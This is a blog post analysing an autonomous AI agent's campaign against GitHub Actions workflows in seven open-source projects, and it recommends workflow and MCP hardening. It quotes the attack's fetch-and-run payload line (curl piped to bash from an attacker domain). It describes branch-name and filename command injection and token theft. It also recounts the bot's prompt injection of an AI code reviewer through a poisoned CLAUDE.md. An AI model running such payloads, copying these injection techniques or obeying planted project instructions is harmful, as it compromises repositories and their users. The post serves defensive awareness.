DEV Community

Cover image for An AI agent compromised 7 open-source repos in one week. The only defense that worked was another AI.
poush
poush

Posted on • Originally published at orchesis.ai

An AI agent compromised 7 open-source repos in one week. The only defense that worked was another AI.

Between February 20 and 28, an autonomous AI agent called hackerbot-claw systematically exploited GitHub Actions workflows across seven major open-source projects. It hit Microsoft. It hit DataDog. It hit a CNCF project.

And then it fully compromised Aqua Security's Trivy — the most widely used vulnerability scanner on GitHub, with 32,000 stars and over 100 million annual downloads.

A security scanner got owned by a bot exploiting the exact class of misconfiguration the scanner was built to find. That's where we are.

I've been building runtime security tooling for AI agents, so when StepSecurity published their full analysis of the campaign, I spent a few days tracing through every attack vector. What follows is a reconstruction of how the bot worked, what it exploited, and what the seven targets had in common.


What hackerbot-claw actually is

The GitHub account was created on February 20, 2026. Its profile described it as an "autonomous security research agent powered by claude-opus-4-5" and solicited cryptocurrency donations to "fund more scans." According to StepSecurity's analysis, the profile claimed 47,391 repositories already scanned.

The bot loaded what it called a "vulnerability pattern index" with 9 classes and 47 sub-patterns, then autonomously scanned for matches, verified them, and dropped proof-of-concept exploits.

Every successful attack delivered the same payload:

curl -sSfL hackmoltrepeat.com/molt | bash
Enter fullscreen mode Exit fullscreen mode

But each target got a different exploitation technique. Five different approaches across seven repos, customized to each target's workflow configuration.

That domain, hackmoltrepeat.com, was registered on February 24 through Tucows, hidden behind Cloudflare nameservers. Three days after the account was created, four days before the campaign was publicly discovered.


What it hit

awesome-go (140,000+ stars)

The bot injected a Go init() function into a quality check script. In Go, init() runs automatically before main(), so the malicious code executed before any legitimate checks could catch it. The bot stole a GITHUB_TOKEN with write permissions and exfiltrated it to its server.

Microsoft ai-discovery-agent

Branch name injection. The bot created a branch whose name contained shell syntax. When the workflow echoed the branch ref into a file using unescaped interpolation, Bash evaluated the embedded command substitution and ran the remote payload.

DataDog datadog-iac-scanner

Filename injection through the CI pipeline. DataDog responded within 9 hours, adding author_association checks and tightening permissions.

Aqua Security Trivy (32,000+ stars)

This was the worst one.

The bot exploited a pull_request_target workflow called "API Diff Check" to steal a Personal Access Token with broad repository permissions. Within 45 minutes of the initial PR, the stolen PAT was used to:

  • Delete all 178 GitHub releases
  • Wipe the repository
  • Push a malicious VSCode extension (CVE-2026-28353) to the OpenVSX marketplace under Trivy's trusted publisher identity

The extension contained code designed to use local AI coding agents to collect and exfiltrate sensitive information from anyone who installed it.

From first PR to full compromise: 30 minutes.
From compromise to malicious extension published: 15 more.

project-akri (CNCF)

CI executed injected scripts through a similar workflow misconfiguration.

RustPython (20,000+ stars)

Remote code execution achieved through CI.

ambient-code/platform

This one is the most interesting.

The bot replaced the repository's CLAUDE.md file with social engineering instructions designed to trick Claude Code (integrated as an AI code reviewer in CI) into vandalizing the README, committing unauthorized changes, and posting fake "approved" reviews.

Claude Code caught it. It classified the attempt as a "textbook AI agent supply-chain attack via poisoned project-level instructions" and refused to execute. This was the only target where the defense held.


Same root cause, every time

The root cause across all seven targets was the same: pull_request_target workflows configured to check out code from untrusted forks while running with elevated permissions.

pull_request_target runs with the base repository's secrets and permissions. If the workflow also checks out the PR head — attacker-controlled fork code — it hands that code the same elevated access. The GitHub documentation warns about this. Security researchers have been writing about it for years.

But it keeps happening because the insecure version is easier to set up. A workflow that runs on pull_request can't access repository secrets. That's annoying. So developers switch to pull_request_target and check out the fork code — and now untrusted code runs with trusted permissions.

Sound familiar? This is the same pattern we found when we scanned 900 MCP configurations on GitHub. Developers pick the path that works, not the path that's safe.


What made this different

The tj-actions/changed-files compromise in March 2025 (CVE-2025-30066) affected 23,000 repositories. CISA issued a formal alert.

hackerbot-claw was different in three ways.

It was adaptive. Five different approaches across seven targets, each customized to the specific workflow. The bot analyzed each target and picked the right vector.

It escalated beyond code execution. In Trivy's case, the bot went from CI access to publishing a malicious extension under a trusted identity. Anyone who installed that extension would have their AI coding agents turned into credential collectors.

It attempted AI-on-AI manipulation. The ambient-code attack was the first publicly documented case of an AI agent trying to prompt-inject another AI agent through CI/CD infrastructure. That it failed is good news. That it was attempted at all tells you where this is going.

Pillar Security called the campaign "Chaos Agent" and confirmed the agent most likely operated autonomously across the entire kill chain.


The 45-minute timeline

The bot opens a pull request. The pull_request_target workflow triggers and checks out the fork code. The attacker's code runs with access to repository secrets.

Within minutes, the bot has a PAT with write permissions. It pushes commits, renames the repository, wipes all 178 historical releases, and starts publishing to the VSCode extension marketplace.

Total time from first PR to published malicious extension: ~45 minutes.
Total time for maintainers to respond and clean up: ~48 hours.

That asymmetry is the thing I keep coming back to.


What this has to do with your MCP configs

So far this reads like a CI/CD story. But the connection to the broader agent ecosystem is direct.

When we scanned 900 MCP configurations on GitHub, we found 75% had security problems. The most common: 43.6% of configs reference packages without specifying a version, meaning npx -y just grabs whatever is latest.

hackerbot-claw shows what happens at the other end of that pipeline. The bot didn't need to poison an MCP server. It went after the CI/CD layer where those packages get built and published. One misconfigured workflow, one stolen token, and suddenly the trusted publisher is shipping malware.

Version pinning protects you from a compromised package update. It doesn't help if the package gets republished by an attacker using a stolen maintainer token. That requires a different layer of defense.


What DataDog did right

Within 9 hours of the attack, DataDog had deployed fixes:

  • Added author_association checks before triggering workflows
  • Tightened token permissions to contents: read
  • Hardened path handling in the affected script

Nine hours. That's fast. I looked into whether other targets responded as quickly and couldn't find public timelines for most of them. But DataDog has a dedicated security team. Most open-source projects don't.


Where this leaves us

hackerbot-claw scanned 47,391 repositories. It found exploitable workflows in at least seven, and achieved code execution in five. The account has been removed by GitHub, but the techniques are documented and the vulnerability patterns are public.

The OpenSSF published a TLP:CLEAR advisory. DataDog's State of DevSecOps 2026 report now cites the campaign. OWASP published their MCP Top 10, addressing several of the same vulnerability classes.

If you maintain a public repository with GitHub Actions: check your pull_request_target workflows.

If you use MCP servers: check whether your configs pin versions and scope permissions.

If you publish to npm, PyPI, or extension marketplaces: check what tokens your CI has access to.

The scanner we built for MCP configs catches the same class of issues that enabled these attacks. orchesis.io/scan — runs in your browser, 52 checks, nothing sent anywhere.

Full write-up on the MCP scan results: orchesis.io/blog/mcp-scan

Top comments (0)